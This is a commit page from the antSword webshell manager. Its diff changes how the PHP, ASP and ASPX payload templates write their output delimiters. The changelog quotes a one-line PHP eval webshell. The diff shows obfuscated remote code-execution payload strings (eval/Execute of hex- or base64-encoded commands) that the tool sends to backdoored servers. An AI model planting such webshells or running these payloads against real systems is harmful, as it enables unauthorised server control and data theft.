Skip to content

A
antSword
Commit 5fa6caef authored by Medicean's avatar Medicean
Browse files
Options

Fix(Core): 修复使用 default 编码器服务端其它函数输出 payload 时数据分割解析的问题

parent ffa859ef
Hide whitespace changes
Inline Side-by-side
Showing with 13 additions and 4 deletions
CHANGELOG.md
View file @ 5fa6caef
...@@ -20,6 +20,15 @@ ...@@ -20,6 +20,15 @@
opts: opts: 类型为 Object, Shell 配置 opts: opts: 类型为 Object, Shell 配置
} }
``` ```
* 修复使用 default 编码器服务端其它函数输出 payload 时数据分割解析的问题
eg:
```php
<?php phpinfo();eval($_POST['ant']);phpinfo();?>
```
因为 `phpinfo();` 会显示发送的 payload, 发送的 payload 中含有数据分割符,导致分割出错
## 2021/02/06 `v(2.1.10)` ## 2021/02/06 `v(2.1.10)`
......
source/core/asp/index.js
View file @ 5fa6caef
...@@ -83,7 +83,7 @@ class ASP extends Base { ...@@ -83,7 +83,7 @@ class ASP extends Base {
let hexCode = formatter['hex'](data['_']); let hexCode = formatter['hex'](data['_']);
// 组合完整的代码 // 组合完整的代码
data['_'] = `eval("Ex"&cHr(101)&"cute(""Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""${tag_s}""""):Ex"&cHr(101)&"cute(""""On Error Resume Next:""""&bd(""""${hexCode}"""")):Response.Write(""""${tag_e}""""):Response.End"")")`; data['_'] = `eval("Ex"&cHr(101)&"cute(""Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""${tag_s.substr(0,tag_s.length/2)}""""&""""${tag_s.substr(tag_s.length/2)}""""):Ex"&cHr(101)&"cute(""""On Error Resume Next:""""&bd(""""${hexCode}"""")):Response.Write(""""${tag_e.substr(0,tag_e.length/2)}""""&""""${tag_e.substr(tag_e.length/2)}""""):Response.End"")")`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
......
source/core/aspx/index.js
View file @ 5fa6caef
...@@ -95,7 +95,7 @@ class ASPX extends Base { ...@@ -95,7 +95,7 @@ class ASPX extends Base {
// base64编码一次数据 // base64编码一次数据
let base64Code = formatter['base64'](data['_']); let base64Code = formatter['base64'](data['_']);
data['_'] = `Response.Write("${tag_s}");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("${aspxencode}").GetString(System.Convert.FromBase64String("${base64Code}")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("${tag_e}");Response.End();`; data['_'] = `Response.Write("${tag_s.substr(0,tag_s.length/2)}"+"${tag_s.substr(tag_s.length/2)}");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("${aspxencode}").GetString(System.Convert.FromBase64String("${base64Code}")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("${tag_e.substr(0,tag_e.length/2)}"+"${tag_e.substr(tag_e.length/2)}");Response.End();`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
......
source/core/php/index.js
View file @ 5fa6caef
...@@ -85,7 +85,7 @@ class PHP extends Base { ...@@ -85,7 +85,7 @@ class PHP extends Base {
} }
// 组合完整的代码 // 组合完整的代码
let tmpCode = data['_']; let tmpCode = data['_'];
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s}";echo @asenc($output);echo "${tag_e}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`; data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
......
source/core/php4/index.js
View file @ 5fa6caef
...@@ -35,7 +35,7 @@ class PHP4 extends PHP { ...@@ -35,7 +35,7 @@ class PHP4 extends PHP {
} }
// 组合完整的代码 // 组合完整的代码
let tmpCode = data['_']; let tmpCode = data['_'];
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s}";echo @asenc($output);echo "${tag_e}";}ob_start();${tmpCode};asoutput();die();`; data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();${tmpCode};asoutput();die();`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment